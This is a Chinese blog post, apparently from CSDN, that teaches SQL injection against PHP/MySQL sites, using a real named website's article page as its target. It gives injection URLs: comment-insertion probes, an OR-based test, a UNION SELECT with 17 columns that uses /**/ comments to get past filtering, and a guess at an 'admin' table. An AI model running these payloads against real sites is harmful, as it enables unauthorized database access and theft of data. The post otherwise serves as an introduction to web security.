php mysql网站入侵_第一篇:PHP+MySQL injection攻击:浅谈网页安全

本文介绍了SQL注入攻击的基本原理,通过示例展示了如何在URL中利用注释符号进行注入,解释了注入后代码的执行情况。同时,讨论了利用AND和OR逻辑操作符进行测试的方法,并探讨了猜测数据库表段和表名的过程。内容涉及Web应用安全和数据库防护。
摘要由CSDN通过智能技术生成

什么意思呢??我想给大家看的是“/*XXXX*/”,没错,会编程的,都知道这是代码注释!换句话说,在代码编译的过程中,这部分会被忽略。充其量他就是个回车或者空格

怎么测试安全性呢?

在原来的地址上http://www.chts.cn/info.php?articleid=545

后面加上注释:

http://www.chts.cn/info.php?articleid=545/*ABCD234*/

再次访问,发现和原来的页面一样没变化。正常显示就表示这次是成功的注射。怎么说呢?

看这里:http://bbs.shudoo.com/viewthread.php?tid=1790611&extra=page%3D1

这个是GET方式提交吧?好吧好吧,注射就是注入,我们用GET的方式把恶意的语句插入到了原来的代码里就叫注入

我们加了/*ABCD234*/,原来的php代码就成了(没看get和post的就不会理解的)

'select * from chts_article where articleid=545/*ABCD234*/  然后原本后面的语句仍然继续执行

这是注释插入,我们看到了插入了注释,充其量就是个空格或者回车。

我们继续访问http://www.chts.cn/info.php?articleid=545标题是《关于举办2005年全国公路治超与计重收费技术研讨会的通知》

变一下变量访问http://www.chts.cn/info.php?articleid=54标题是《关于举办2005年全国公路治超与计重收费技术研讨会的通知》

我们看到了两个不同标题的文档。编号545和编号54的文档。

我们下面用and和or来测试:

继续使用GET

http://www.chts.cn/info.php?articleid=545/*ABC*/orarticalid=54

原本articleid=545的页面就成了54号文档《关于举办2005年全国公路治超与计重收费技术研讨会的通知》了

这是怎么回事呢,就是一个逻辑门,学过编程的都应该知道这个。

再看原来的php语句就成了'SELECT * FROM chts_article WHERE articleid = 545/*ABCD234*/or articleid = 54

不懂编程的话,and和or你也就不用知道了

既然已经确定过滤不严漏洞存在了,就要猜表段数

其实这个比较机械,而且非常机械,网上的工具很多

这里我猜的表段是第17

http://www.chts.cn/info.php?articleid=545/**/and/**/1=2/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17/*

这个当做是排座位好了,不需要理解太深(其实我也不怎么理解,我怕我说了不对被人笑哈)

好了,下面开始猜表段名我们假设是admin

那么语句就该是:

http://www.chts.cn/info.php?articleid=545/*Juliet_NaNa*/and/*Juliet_NaNa*/1=2/*Juliet_NaNa*/union/*Juliet_NaNa*/select/*Juliet_NaNa*/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17/*Juliet_NaNa*/from/*Juliet_NaNa*/admin/*

显然显示错误

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值